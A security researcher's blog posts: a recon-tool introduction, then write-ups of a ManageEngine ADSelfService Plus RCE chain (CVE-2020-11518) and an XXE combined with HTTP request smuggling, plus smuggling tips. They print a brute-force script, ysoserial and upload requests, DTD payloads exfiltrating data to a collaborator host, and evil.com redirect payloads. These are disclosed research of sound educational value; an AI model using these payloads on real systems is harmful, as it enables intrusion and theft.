Introducing BBRF: yet another Bug Bounty Reconnaissance Framework

An example use case of bbrf, here integrating with subfinder from projectdiscovery.io

Like anyone involved in bug bounty hunting, I have encountered a number of challenges in organizing my reconnaissance data over the years. In this article, I want to introduce the solution I have designed to address some of those headaches, hoping that it may prove useful to you in some way.

Get started

If you’ve stumbled on this article looking to get started with BBRF immediately, head over to the GitHub repo right away! If you’re interested to learn more about what it is (and what it ain’t), feel free to continue reading below.

What’s the problem?

When it comes to reconnaissance, or “recon”, in bug bounty hunting, it is clear that there is a lot of tooling available. Whereas five years ago, subdomain bruteforcing with fierce was all the recon I could muster, the community today has access to an abundance of very good tools that either specialize in very specific tasks (e.g. massdns), try to be amazing all-rounders (e.g. ffuf) or successfully combine a lot of submodules into one big framework (e.g. amass).

My biggest struggle when working with this growing variety of tools was always: being organized. In particular, managing the output of different tools and combining them to enrich each other was cumbersome enough that I kept on using tools on an ad-hoc basis. In other words, I would use tools for their specific purpose, interpret and use the output manually, and move on to the next one.

To overcome this problem in an attempt to be more structured, I started implementing bbrf, which in the first place had to be a command-line tool allowing me to easily list all domains and IPs belonging to a project, and to store domains and IPs for later use. In particular, I was longing to be able to run commands like: bbrf domains and bbrf ips to list my data, and sublist3r.py | bbrf domain add - to store my results.

Architecture

To achieve the desired functionality, BBRF was designed as two separate components: the BBRF server, in the form of a central document store, and the BBRF client in the form of a Python script.

Document store

The document store, or BBRF server, is a central document-oriented database running on CouchDB. CouchDB comes with a standard HTTP-based API, which allows interacting with the database by means of HTTP requests. Data is stored in JSON documents which has the advantage of not requiring any predefined data structure.

At the time of publishing, the following document types are supported by default:

  • programs, including a list of inscope and outscope domains and a disabled flag;
  • domains, belonging to a program and containing a list of IPs they resolve to;
  • ips, belonging to a program and containing a list of corresponding domains;

Client

The BBRF client, on the other hand, can be thought of as a Python wrapper around the HTTP calls to the JSON database. It was built with simplicity in mind, according to the Linux adagio to “do one thing and do it well”, with its primary purpose to output and digest domains and IP addresses, so as to work well together with other tools by piping input and output to and from the client.

# find all domains that contain "dev"
bbrf domains | grep 'dev'
# pipe all domains from subfinder into bbrf
bbrf program scope --wildcard --top | subfinder | bbrf domain add -

Features

Programs & Scopes

BBRF stores your recon data in programs, in line with how bug bounty platforms typically work. Create a new program with bbrf new and define both the inscope and outscope domains to get started:

$~ bbrf new test
$~ bbrf inscope add '*.example.com' 'www.example.com'
$~ bbrf outscope add 'blog.example.com'

Now every added domain will be checked against the known domains and the defined scope before being ingested in the central database:

$~ bbrf domain add 'test.example.com' 'blog.example.com' 'demo.example.com' 'test.example.com' 'www.example.org'
$~ bbrf domains
demo.example.com
test.example.com
# note that the outscoped domains have been omitted

Collaboration & Distribution

Because of the central database, you can install a client on any number of machines and configure them to point to the same BBRF server. This allows you to run daily cron jobs on your VPS in the cloud, and readily access their output from your local workstation. Or to collaborate with other bug bounty hunters, and always work with the same recon data, independent on where it came from or who discovered it.

The central repository allows you to build your workflows around data that is synced across multiple devices and users.

Extensibility

Since all information is written to JSON documents, the data format can be easily modified. Anything that can be represented in JSON can be stored in a new JSON document, or appended as an attribute to existing programs, domains or IPs. This would allow, for example, to also store a list of identified URLs, open ports, file hashes, full HTTP responses, etc. These changes would not require any modification on the server side, except for additional views if the data needs to be indexed and queried. In the Python client, a number of simple changes and additions would allow interacting with that data from the command line.

All other features of CouchDB can be leveraged on your BBRF server. For example, think of user-based access control, data replication across multiple servers, the Fauxton interface to interact with your data through an admin panel, or the ability to write a custom dashboard to visualize your recon data.

AWS Lambda (aka Cloud Magic)

BBRF comes with a Serverless configuration file that makes it easy to deploy a BBRF instance to AWS Lambda out of the box. This allows you to interact with the central repository from your micro services running in the cloud:

curl https://abc.execute-api.us-east-1.amazonaws.com/dev/bbrf -d 'task=domains -p vzm'

I have used this to save the results from a number of integrated agents deployed to their own lambdas to aggregate data from tools such as crt.sh, dnsgrep and sublister that regularly run recon scripts in the AWS cloud.

The Power of JSON

Because of its architecture, BBRF stores all data as raw JSON. BBRF supports querying any JSON document by its identifier, which allows you to quickly inspect the stored information from your command line:

$~ bbrf show example | jq
{
  "_id": "example",
  "_rev": "11-e7a49b214e37e5cc890a3620fde8a0c5",
  "outscope": [
    "blog.example.com"
  ],
  "passive_only": false,
  "type": "program",
  "inscope": [
    "*.example.com",
    "www.example.com"
  ],
  "disabled": false
}
$~ bbrf show www.example.com | jq
{
  "_id": "www.example.com",
  "_rev": "1-1c63d262fd46ace7f8eeb0fdd5370d07",
  "ips": [],
  "program": "example",
  "type": "domain"
}

What it ain’t

BBRF does not intend to be another all-in-one recon automation tool. Instead, it aims to provide a simple interface to integrate with the existing tools you already know and love, and to allow sharing your results across devices.

Neither was it designed to ingest every type of data, and transform it into a uniform dataset. By default, bbrf will only process domains and IPs that are piped to it in newline-separated form and in plaintext format.

At the time of publishing, bbrf only supports domains and IPs, which means there are a number of known limitations:

  • No support for URLs;
  • No support for ports and services;
  • No support for IPv6;

Feedback

I really hope this project can help you overcome some of the issues you are facing, in the same way it has helped me over the time that I have been using it. And I really look forward to seeing more people adopt this in their day-to-day workflows.

However, since I have never held a developer role (and my coding consequently is pretty rubbish), I expect there may be some feedback about bugs you will inevitably encounter, or features that you believe are missing. In that case, please turn to the GitHub issues page or create a new Pull Request and hopefully we can sort things out!

CVE-2020-11518: how I bruteforced my way into your Active Directory

Last May, I discovered that a critical vulnerability I had reported earlier this year had resulted in my first CVE. Since the combination of vulnerabilities that led to this unauthenticated remote code execution (RCE) was pretty fun to discover, I want to share the story about how brute force enabled me to hack into two organizations’ Active Directory-linked systems.

The Target

While performing some routine visual reconnaissance with Aquatone, I noticed a similar-looking login page on two different subdomains from unrelated bug bounty programs.

Both subdomains contained customized versions of this default login screen.

The software behind this login screen is Zoho ManageEngine ADSelfService Plus, which offers a portal that allows users to reset the password of their own Active Directory (AD) accounts. (Anybody who has worked in a large organization will recognize why this sounds like a useful thing to have.)

Since I figured that any bugs I would find on this product could potentially impact multiple companies, and more so, because it sounded very likely that this is linked to the organization’s Active Directory, it seemed like a good idea to spend some time here.

My first efforts led to discovering a few basic reflected Cross-Site Scripting (XSS) vulnerabilities, which had apparently been identified by other researchers already. So I had to dig a little deeper. Luckily, it turned out the whole product can be downloaded and installed as a trial for 30 days.

The Setup

Since I was convinced there would probably be more XSS vulnerabilities to find, I decided to download and install the software with the idea of browsing through the Java source code looking for more bugs.

Having installed the software, I now had the advantage of being able to execute all tests locally, as well as read through the source code to understand exactly what happens in the application, and even use grep in the installation folder to find potentially interesting files.

Sidenote

To reverse engineer Java applications, I like to use Bytecode Viewer, which decompiles and formats Java class files into readable Java code. It also allows to edit byte code and recompile the file on the fly and works great to decompile Android APK files too.

I started off manually browsing through some of the Java source files without many interesting discoveries. However, I did build an understanding of the software components and how they work together. This tends to be invaluable when looking for complex bugs in applications, so was definitely worth spending a couple of hours on. As a result, I had a pretty good picture of application features, the parts of the application that consisted mostly of legacy code vs. the parts that looked more recent, the parts that had been modified to fix previous security vulnerabilities, etc.

At one point, I decided to build a word list of application endpoints, which could hopefully serve two purposes: to perform some “classic” security tests directly against the endpoint, and to serve as a useful resource when targeting similar applications at some point in the future.

The Bugs

1. Insecure deserialization in Java

During my enumeration of the application’s endpoints, I spotted the following lines in one of the web.xml files:

<servlet-mapping>
<servlet-name>CewolfServlet</servlet-name>
<url-pattern>/cewolf/*</url-pattern>
</servlet-mapping>

When I googled that, I found a published RCE against a cewolf endpoint on another ManageEngine product, using a path traversal in the img parameter – this looked very promising!

Sure enough, after manually placing a file in a folder on my local installation, I could confirm that the deserialization vulnerability also existed in this version of ADSelfService Plus by browsing to http://localhost:8888/cewolf/?img=/../../../path/to/evil.file

This meant I had a ready-to-use Java deserialization vulnerability on the targeted sites, but I would only be able to exploit it if I found a way to upload arbitrary files to the server first. So the work wasn’t quite done yet.

2. Arbitrary file upload

Finding an arbitrary file upload vulnerability did not look like an easy challenge. To maximize my attack surface, I continued to configure the software on my machine, which required setting up a local Domain Controller and an Active Directory domain to play with.

Fast forward through hours of downloading ISOs, making space on HDDs, VMware Workstation shenanigans, Microsoft Windows Server administration and watching Youtube videos with titles like “How to Set Up a Windows Server 2019 Domain Controller“, and I finally had a setup that allowed me to log in to the admin panel.

I finally set up a working copy of ADSelfService Plus, time to hack.

With full admin access to the application, I could now further map out application features and API endpoints. For obvious reasons, I spent most of my time investigating all different upload features in the application, until I came across one feature that supported uploading a smartcard certificate configuration, resulting in a POST request to /LogonCustomization.do?form=smartCard&operation=Add

When I noticed that the uploaded certificate file was stored on the server’s file system without modifying the name, I figured that this might be the way forward to leverage the deserialization bug! So I traced this API call through the source code to find out more about possible ways to attack this.

On a high level, this is how that worked:

  1. A logged-in administrator can upload a smartcard configuration to /LogonCustomization.do?form=smartCard&operation=Add;
  2. This triggers a backend request to the server’s authenticated RestAPI on /RestAPI/WC/SmartCard?HANDSHAKE_KEY=secret using a secret handshake that is generated on the server side;
  3. Before executing the requested action, the HANDSHAKE_KEY is validated against a second API endpoint on /servlet/HSKeyAuthenticator?PRODUCT_NAME=ManageEngine+ADSelfService+Plus&HANDSHAKE_KEY=secret which returns SUCCESS or FAILED depending on the passed secret;
  4. If successful, the uploaded certificate is written to C:\ManageEngine\ADSelfService Plus\bin

Interestingly, the /RestAPI endpoint was publicly accessible, so any request with a valid HANDSHAKE_KEY would bypass user authentication and be processed by the server.

Furthermore, the /servlet/HSKeyAuthenticator was also publicly accessible, allowing an unauthorized user to manually verify if an authentication secret was valid or not.

With this in mind, I returned to the now familiar source code.

3. Bruteforceable authentication key

I identified two interesting Java classes with some help from grep, and from my installation’s PostgreSQL database that contained a useful inventory of API endpoints and their authentication needs:

Another benefit to local installations of software is full access to the underlying database.

A snippet from HSKeyAuthenticator.class in com.manageengine.ads.fw.servlet:

public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
      try {
         String message = "FAILED";
         RestAPIKey.getInstance();
         String apiKey = RestAPIKey.getKey();
         String handShakeKey = request.getParameter("HANDSHAKE_KEY");
         if (handShakeKey.equals(apiKey)) {
            message = "SUCCESS";
         }

         PrintWriter out = response.getWriter();
         response.setContentType("text/html");
         out.println(message);
         out.close();
      } catch (Exception var7) {
         HSKeyAuthenticator.out.log(Level.INFO, " ", var7);
      }

   }

And one from RestAPIKey.class in package com.manageengine.ads.fw.api:

  public static void generateKey()
  {
    Long cT = Long.valueOf(System.currentTimeMillis());
    key = cT.toString();
    generatedTime = cT;
  }

  public static String getKey()
  {
    Long cT = Long.valueOf(System.currentTimeMillis());
    if ((key == null) || (generatedTime.longValue() + 120000L < cT.longValue()))
    {
      generateKey();
    }
    return key;
  }

As you can see from those pieces of code, the API authentication key of the server is set to the current time in milliseconds and has a lifespan of 2 minutes. This means that at any given moment, there are 120 000 possible authentication keys (120 seconds * 1000 milliseconds/second).

In other words, if I could generate at least 1000 requests per second consistently over a time span of 2 minutes, I would have a guaranteed hit at the moment the authentication key expired and regenerated. While that seems like a large number for a network-level attack, a successful attack is not necessarily beyond the realm of possibility. Especially keeping in mind that even at a lower than 100% success rate, and given sufficient time, a successful hit becomes more and more likely.

In practice, I quickly had a working proof-of-concept that would brute force my local instance’s secret in a matter of minutes.

Brute forcing the secret on my local instance worked a charm.

However, when employing the script against a live target (i.e. over an actual internet connection), I wasn’t as lucky. I ran and reran the script with different configurations and settings for hours, and overnight without result, and was starting to fear my approach would have to be abandoned.

Furthermore, I got temporarily sidetracked because I wasn’t sure what time zone my target servers were running in. I ended up rerunning my script with multiple offsets from my own (CET) until I found out that Java’s currentTimeMillis apparently returns time in Coordinated Universal Time (UTC), and I needn’t have bothered.

Eventually, after more trial and error, I landed on the following Turbo Intruder script, which, based on the actual requests per seconds (rps), tried to authenticate using every rps/2 milliseconds before and after the current timestamp. This provided reasonable coverage and minimized potential blind spots:

import time
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                       concurrentConnections=20,
                       requestsPerConnection=200,
                       pipeline=True,
                       timeout=2,
                       engine=Engine.THREADED
                       )
    engine.start()
    rps = 400 # this is about the number of requests per second I could generate from my test server, so not quite the ideal 1000 per second

    while True:
        now = int(round(time.time()*1000))
        for i in range(now+(rps/2), now-(rps/2), -1):
            engine.queue(target.req, str(i))

def handleResponse(req, interesting):
    if 'SUCCESS' in req.response:
        table.add(req)

And moving the HTTP request to a file base.txt to prepare the attack with a headless Turbo Intruder:

POST /servlet/HSKeyAuthenticator?PRODUCT_NAME=ManageEngine+ADSelfService+Plus&HANDSHAKE_KEY=%s HTTP/1.1
Host: localhost:8888
Content-Length: 0
Connection: keep-alive

.

All I needed now, was a little bit of patience and a great deal of luck.

Brute forcing a secret timestamp with Turbo Intruder

Wham! I love when theory comes true. As expected and despite my doubts, the authentication key could successfully be brute forced, even with a much lower throughput than the ideal 1000 requests per second (note the screenshot to the live target reached an average of only 56 rps)!

The Exploit

Now, with all ingredients ready, the final exploit was trivial.

I generated a bunch of Java payloads with the deserialization framework ysoserial, and found out that the following worked:

java -jar ysoserial-master-SNAPSHOT.jar MozillaRhino1 "ping ping-rce-MozillaRhino1.<your-burp-collaborator>"

Next, I brute forced the authentication key with my script from above, and used it to upload the ysoserial payload to the server via the authenticated RestAPI:

POST /RestAPI/WC/SmartCard?mTCall=addSmartCardConfig&PRODUCT_NAME=ManageEngine+ADSelfService+Plus&HANDSHAKE_KEY=1585552472158 HTTP/1.1
Host: localhost:888
Content-Length: 2464
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Connection: close

------WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="pieter.evil"
Content-Type: text/xml

<binary-ysoserial-payload-here>
------WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Content-Disposition: form-data; name="CERTIFICATE_NAME"

blah
------WebKitFormBoundaryxkQ2P09dvbuV1Pi4
Content-Disposition: form-data; name="SMARTCARD_CONFIG"

{"SMARTCARD_PRODUCT_LIST":"4"}
------WebKitFormBoundaryxkQ2P09dvbuV1Pi4--

And to finish things off, I issued a simple GET request to /cewolf/?img=/../../../bin/pieter.evil and saw the most beautiful notification in the world:

Hacker’s delight: a DNS lookup request as a result of a successful Java deserialization attack.

The Outcome

Armed with a chain of vulnerabilities that led to RCE on an AD-connected server, I argued that an attacker might abuse the link with the Domain Controller to hijack domain accounts or create new accounts on the AD domain, leading to much wider access into the companies’ internal networks, e.g. by accessing internal services via their public VPN portals.

I submitted the vulnerability reports for both companies, one of which was rewarded as Critical, the other of which was categorized as High due to it being a vendor security issue without an available patch (0-day).

Timeline

  • 26/Mar/2020 – Installed a local version of the software;
  • 30/Mar/2020 – Reported the RCE chain to company one;
  • 31/Mar/2020 – Reported the RCE chain to company two;
  • 2/Apr/2020 – Submitted the vulnerability information to Zoho’s in-house bug bounty program;
  • 3/Apr/2020 – Zoho published a security update on their website and pushed a patch in release 5815;
  • 3/Apr/2020 – Company two awarded a bounty as Critical and patched their installation;
  • 12/Apr/2020 – Company one awarded a bounty as High and removed public access to their installation

XXE-scape through the front door: circumventing the firewall with HTTP request smuggling

In this write-up, I want to share a cool way in which I was able to bypass firewall limitations that were stopping me from successfully exploiting an XML External Entity injection (XXE) vulnerability. By combining the XXE with a separate HTTP request smuggling vulnerability, I was able to grab some secret information and escape through the front door. Let’s go!

architectuur, balkon, brandtrap
A fire escape, because this write-up is about escaping a firewall. It’s a little joke.

The Hole in the Wall

The story starts when Burp Suite pointed out that a file upload endpoint was parsing the embedded XML in some image file formats, which it was able to determine because the embedded external entities triggered a DNS request to the Burp Collaborator.

The generated report by the excellent UploadScanner extension for Burp Suite.

Funnily enough, this report had been sitting in my Burp project file for more than two months before I finally noticed it. When I did, I quickly started playing with the payloads to see if I could verify this finding, and maybe trigger an HTTP request rather than DNS only.

Sidenote

When exploiting an XXE vulnerability, it is important that you can reference your own external Document Type Definition (DTD) file. While internal DTD declarations are possible, they do not typically allow the advanced markup that makes an XXE attack so powerful. To reference an external DTD file, outgoing HTTP request traffic should be allowed.

In my earlier post “From blind XXE to root-level file read access“, I explain this limitation and another way to circumvent the limitation of a firewall that blocked outgoing HTTP traffic.

Too bad. I found myself unable to trigger outgoing HTTP requests using any of the tricks that had worked for me in similar scenarios before: I couldn’t find an unpatched Jira to serve as a proxy, nor was the gopher protocol enabled to try and leverage existing proxy servers on the company network:

So if I’m unable to include a remote DTD file, what options do I have? Lucky for me, this excellent research by Arseniy Sharoglazov shows that you can achieve the same advanced markup of an external DTD by embedding variables in DTD files that exist on the local file system:

By leveraging this technique, and the extended work by GoSecure, I was able to confirm the existence of a local DTD C:\Windows\System32\wbem\xml\wmi20.dtd which already provided us with a solid proof of concept:

<!DOCTYPE message [
    <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd">

    <!ENTITY % CIMName '>
        <!ENTITY % file "testtesttest">
        <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'https://%file;.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net/'>">
        %eval;
        %error;
        <!ELEMENT aa "bb"'>

    %local_dtd;
]>
<message></message>

If that looks complicated, that’s because it is. For readability purposes, the above is essentially equivalent to an external DTD with the following content:

<!ENTITY % file "testtesttest">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'https://%file;.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net/'>">
%eval;
%error;

In other words, the following happens:

  1. Define a parameter entity %file; with value “testtesttest“;
  2. Define a parameter entity %eval that combines the first variable into a string to define an external entity %error; to…
  3. …try and access the resource (note the SYSTEM keyword) at location https://testtesttest.wvv...burpcollaborator.net
  4. By “printing” %eval; and %error;, their respective values are included in the DTD, resulting in:
    1. the definition of %error; coming to life, and
    2. referencing it so its external resource is fetched, so its content can be included;

As a result, lo and behold, the string testtesttest is appended with the rest of the URL, and shows up in the external DNS lookup towards our Burp Collaborator:

At this point, I started looking for some internally accessible information that could be leaked as part of a domain name (i.e. strings without newlines, consisting only of alphanumerics, dots, and dashes) and was lucky to find a web service that returned the simple string “none“:

<!ENTITY % file SYSTEM "https://internal.company.com/api/endpoint">
% eval "<!ENTITY % error SYSTEM 'https://%file;.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net/'>">
%eval;
%error;

This resulted in a DNS lookup to none.wvv4l1hdkvwdd1bnpnoqomnuclib60.burpcollaborator.net, demonstrating we could leak internal information to an outside attacker.

While the leaked information is utterly useless and could not reasonably be considered sensitive, I considered this POC sufficient to be reported. But my thirst for impact was not quite quenched. So I reported the issue, and I kept digging!

The Great Escape

I cannot remember everything I tried, but eventually, I had the idea to get a list of all the domains in the program’s scope and use them in an Intruder attack as part of the XXE payload. In doing so, I wanted to determine if any of the domains maybe resolved to internal IP addresses on the internal network and might lead to exfiltrating more interesting data from endpoints that weren’t blocked by the firewall.

In order to determine which URLs were resolving and accessible from the vulnerable server, I modified the previous payload as follows (simplified):

<!ENTITY % file SYSTEM "http://www.google.com">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'https://%file;.<burp-collaborator-url>/'>">
<!ENTITY % checkpoint SYSTEM "http://canary.<burp-collaborator-url>">
%checkpoint;
%eval;
%error;

If I now received an incoming DNS request on canary.<burp-collaborator-url>, that meant the file location (in this case http://www.google.com) was successfully contacted; whereas if I didn’t, that meant an error was thrown before the canary could be resolved. This was easily verified with local paths like file:///C:\Windows\win.ini and file:///C:\idontexist.

As a result, I now knew that the firewall on the network was blocking HTTP requests to almost everywhere, but not to a number of domains of the format *.external.company.com. What made this particularly interesting is that a few of these whitelisted domains were flagged by the HTTP request smuggler plug-in as vulnerable. This suddenly sounded very promising!

Sidenote

HTTP request smuggling vulnerabilities can be tricky to exploit. Read my article “HTTP Request Smuggling – 5 Practical Tips” for things you can look for to demonstrate impact.

After conscientiously working through each of the vulnerable hosts and a lot of trial and error, I found one useful application where I could leverage the HTTP request smuggling vulnerability. The server ran an application with an endpoint to save profile information: this made it possible to store and read smuggled requests by sending a desynchronizing request like this:

POST /app/ HTTP/1.1
 Transfer-Encoding: chunked
Host: ext.company.com
Content-Length: 136
Pragma: no-cache

2
{}
0

POST /app/SaveProfile HTTP/1.1
Host: ext.company.com
Cookie: attacker_session_cookie
Content-Length: 100

Description=XXX

When sending this HTTP request to the vulnerable web server, the desync resulted in the next HTTP request to the server (possibly by a random visitor) being appended to the POST body of the poisoned request:

POST /app/SaveProfile HTTP/1.1
Host: ext.company.com
Cookie: attacker_session_cookie
Content-Length: 100

Description=XXXABGET / HTTP/1.1\r\nHost: ext.company.com[...]

Since I could use my attacker’s session cookie in the poisoned request, I could now go and read the smuggled request in the description of my own profile!

Interestingly, because this vulnerability only existed on the HTTP layer of the application (port 80) and not on HTTPS (port 443), this vulnerability in itself was of low impact because hardly any real-life users would have their requests poisoned in a successful attack. However, by combining it with the XXE I was working on, the proverbial whole quickly became more than the sum of its parts.

By poisoning the back-end’s HTTP layer and quickly following this by sending an XML payload that would trigger the poisoned request, it was possible to construct a payload that allowed me to read sensitive information by sending it to the description of my profile on the whitelisted application (simplified for readability):

<!ENTITY % file SYSTEM "http://127.0.0.1/api/secret">
<!ENTITY % eval "<!ENTITY % error SYSTEM 'http://ext.company.com/exfiltrate-via-smuggling-%file;'>">
%eval;
%error;

This concatenated the value read from http://127.0.0.1/api/secretand issued a request to http://ext.company.com/exfiltrate-via-smuggling-<token>, which we could successfully poison. The result was beautiful:

The exfiltrated data was available in my profile description as a result of the successful request smuggling attack.

I reported these as two different vulnerabilities and demonstrated the combined impact in one of the two. I argued that the combined impact was critical, but eventually, the company awarded as “High” and added a bonus as a token of appreciation.

Lessons learned

  • The applications of HTTP request smuggling are varied;
  • If you can only exfiltrate information via DNS, you may want to keep digging;

Timeline

  • 19/Dec/2019 – Reported the XXE with a simple POC;
  • 20/Dec/2019 – Reported the request smuggling vulnerability;
  • 20/Dec/2019 – Updated the XXE report with a POC combining the two reports to demonstrate leaking sensitive data;
  • 2/Jan/2020 – HTTP request smuggling report triaged;
  • 6/Jan/2020 – XXE report triaged after providing a video of the attack in action since it was difficult for triage to reproduce;
  • 8/Jan/2020 – Bounty awarded for request smuggling as Medium criticality;
  • 8/Jan/2020 – Bounty awarded for XXE as High criticality;
  • 29/Feb/2020 – Requested permission to publish write-up;
  • 18/Mar/2020 – Permission granted.

HTTP Request Smuggling – 5 Practical Tips

When James Kettle (@albinowax) from PortSwigger published his ground-breaking research on HTTP request smuggling six months ago, I did not immediately delve into the details of it. Instead, I ignored what was clearly a complicated type of attack for a couple of months until, when the time came for me to advise a client on their infrastructure security, I felt I better made sure I understood what all the fuss was about.

Since then, I have been able to leverage the technique in a number of nifty scenarios with varying results. This post focuses on a number of practical considerations and techniques that I have found useful when investigating the impact of the attack against servers and websites that were found to be vulnerable. If you are unfamiliar with HTTP request smuggling, I strongly recommend you read up on the topic in order to better understand what follows below. These are the two absolute must-reads:

Recap

As a recap, there are some key topics that you need to grasp when talking about request smuggling as a technique:

  1. Desynchronization

At the heart of a HTTP request smuggling vulnerability is the fact that two communicating servers are out of sync with each other: upon receiving a HTTP request message with a maliciously crafted payload, one server will interpret the payload as the end of the request and move on to the “next HTTP request” that is embedded in the payload, while the second will interpret it as a single HTTP request, and handle it as such.

  1. Request Poisoning

As a result of a successful desynchronization attack, an attacker can poison the response of the HTTP request that is appended to the malicious payload. For example, by embedding a smuggled HTTP request to a page evil.html, an unsuspecting user might get the response of the evil page, rather than the actual response to a request they sent to the server.

  1. Smuggling result

The result of a successful HTTP smuggling attack will depend heavily on how the server and the client respond to the poisoned request. For example, a successful attack against a static website that hosts a single image file will have a very different impact than successfully targeting a dynamic web application with thousands of concurrent active users. To some extent, you might be able to control the result of your smuggling attack, but in some cases you might be unlucky and need to conclude that the impact of the attack is really next to none.

Practical tips

By and large, I can categorize my experiences with successful request smuggling attacks in two categories: exploiting the application logic, and exploiting server redirects.

When targeting a vulnerable website with a rich web application, it is often possible to exfiltrate sensitive information through the available application features. If any information is stored for you to retrieve at a later point in time (think of a chat, profile description, logs, ….) you might be able to store full HTTP requests in a place where you can later read them.

When leveraging server redirects, on the other hand, you need to consider two things to build a decent POC: a redirect needs to be forced, and it should point to an attacker-controlled server in order to have an impact.

Below are five practical tips that I found useful in determining the impact of a HTTP request smuggling vulnerability.

#1 – Force a redirect

Before even trying to smuggle a malicious payload, it is worth establishing what payload will help you achieve the desired result. To test this, I typically end up sending a number of direct requests to the vulnerable server, to see how it handles edge cases. When you find a requests that results in a server direct (HTTP status code 30X), you can move on to the next step.

Some tests I have started to incorporate in my routine when looking for a redirect are:

  • /aspnet_client on Microsoft IIS will always append a trailing slash and redirect to/aspnet_client/
  • Some other directories that tend to do this are /content, /assets,/images, /styles, …
  • Often http requests will redirect to https
  • I found one example where the path of the referer header was used to redirect back to, i.e. Referer: https://www.company.com//abc.burpcollaborator.net/hacked would redirect to //abc.burpcollaborator.net/hacked
  • Some sites will redirect all files with a certain file extensions, e.g. test.php to test.aspx

#2 – Specify a custom host

When you found a request that results in a redirect, the next step is to determine whether you can force it to redirect to a different server. I have been able to achieve this by trying each of the following:

  • Override the hostname that the server will parse in your smuggled request by including any of the following headers and investigating how the server responds to them:
    • Host: evil.com
    • X-Host: evil.com
    • X-Forwarded-Host: evil.com
  • Similarly, it might work to include the overridden hostname in the first line of the smuggled request: GET http://evil.com/ HTTP/1.1
  • Try illegally formatting the first line of the smuggled request: GET .evil.com HTTP/1.1 will work if the server appends the URI to the existing hostname: Location: https://vulnerable.com.evil.com

#3 – Leak information

Regardless of whether you were able to issue a redirect to an attacker-controlled server, it’s worth investigating the features of the application running on the vulnerable server. This heavily depends on the type of application you are targeting, but a few pointers of things you might look for are:

  • Email features – see if you can define the contents of an email of which receive a copy;
  • Chat features – if you can append a smuggled request, you may end up reading the full HTTP request in your chat window;
  • Update profile (name, description, …) – any field that you can write and read could be useful, as long as it allows special and new-line characters;
  • Convert JSON to a classic POST body – if you want to leverage an application feature, but it communicates via JSON (e.g. {"a":"b", "c":"3"}), see if you can change the encoding to a classic a=b&c=3 format with the header Content-Type: application/x-www-form-urlencoded.

#4 – Perfect your smuggled request

If you are facing issues when launching a smuggling attack, and you don’t see your expected redirect but are facing unexpected error codes (e.g. 400 Bad Request), you may need to put some more information in your smuggled request. Some servers fail when it cannot find expected elements in the HTTP request. Here are some things that sometimes work:

  • Define Content-length and Content-Type headers;
  • Ensure you set Content-Type to application/x-www-form-urlencoded if you are smuggling a POST request;
  • Play with the content length of the smuggled request. In a lot of cases, by increasing or decreasing the smuggled content length, the server will respond differently;
  • Switch GET to POST request, because some servers don’t like GET requests with a non-zero length body.
  • Make sure the server does not receive multiple Host headers, i.e. by pushing the appended request into the POST body of your smuggled request;
  • Sometimes it helps to troubleshoot these kinds of issues if you can find a different page that reflects your poisoned HTTP request, e.g. look for pages that return values in POST bodies, for example an error page with an error message. If you can read the contents of your relayed request, you might figure out why your payload is not accepted by the server;
  • If the server is behind a typical load-balancer like CloudFlare, Akamai or similar, see if you can find its public IP via a service like SecurityTrails and point the HTTP request smuggling attack directly to this “backend”;
  • I have seen cases where the non-encrypted (HTTP) service listening on the server is vulnerable to HTTP request smuggling attacks, whereas the secure channel (HTTPS) service isn’t, and the other way around. Ensure you test both separately and make sure you investigate the impact of both services separately. For example, when HTTP is vulnerable, but all application logic is only served on HTTPS pages, you will have a hard time abusing application logic to demonstrate impact.

#5 – Build a good POC

  • If you are targeting application logic and you can exfiltrate the full HTTP body of arbitrary requests, that basically boils down to a session hijacking attack of arbitrary victims hitting your poisoned requests, because you can view the session cookies in the request headers and are not hindered by browser-side mitigations like the http-only flag in a typical XSS scenario. This is the ideal scenario from an attacker’s point of view;
  • When you found a successful redirect, try poisoning a few requests and monitor your attacker server to see what information is sent to your server. Typically a browser will not include session cookies when redirecting the client to a different domain, but sometimes headless clients are less secure: they may not expect redirects, and might send sensitive information even when redirected to a different server. Make sure to inspect GET parameters, POST bodies and request headers for juicy information;
  • When a redirect is successful, but you are not getting anything sensitive your way, find a page that includes JavaScript files to turn the request poisoning into a stored XSS, ensure your redirect points to a JavaScript payload (e.g. https://xss.honoki.net/), and create a POC that generates a bunch of iframes with the vulnerable page while poisoning the requests, until one of the <script> tags ends up hitting the poisoned request, and redirects to the malicious script;
  • If the target is as static as it gets, and you cannot find a redirect, or there isn’t a page that includes a local JavaScript file, consider holding on to the vulnerability in case you can chain it with a different one instead of reporting it as is. Most bug bounty programs will not accept or reward a HTTP request smuggling vulnerability if you cannot demonstrate a tangible impact.

Finally, keep in mind to act responsibly when testing for HTTP request smuggling, and always consider the impact on production services. When in doubt, reach out to the people running the show to ensure you are not causing any trouble.

How to: Burp ♥ OpenVPN

Update February 2024: Most of the contents of this article can now be achieved with this Burp plugin that I wrote: https://github.com/honoki/burp-digitalocean-droplet-openvpn – make sure to give it a spin!

When performing security tests, you will often be required to send all of your traffic through a VPN. If you don’t want to send all of your local traffic over the same VPN, configuring an easy-to-use setup can sometimes be a pain. This post outlines one possible way of configuring Burp Suite to send all its traffic through a remote VPN, without having to run the VPN on your own machine.

In this guide, I will describe a setup that makes use of the following tools. Note, however, that most of these can be replaced by similar tools to accomplish the same goals.

  • Burp Suite
  • PuTTY
  • OpenVPN running on a Virtual Private Server (VPS)
  • A second VPS as a jumphost (not required if you have a static IP)
  • Browser extension Switchy Omega in Chrome or Firefox

Why?

There are a few reasons why configuring a VPN to execute your security tests may be a good idea:

  1. Testing assets that are not publicly available, e.g. located on an internal network; this is often the case when performing internal infrastructure tests or tests against UAT environments;
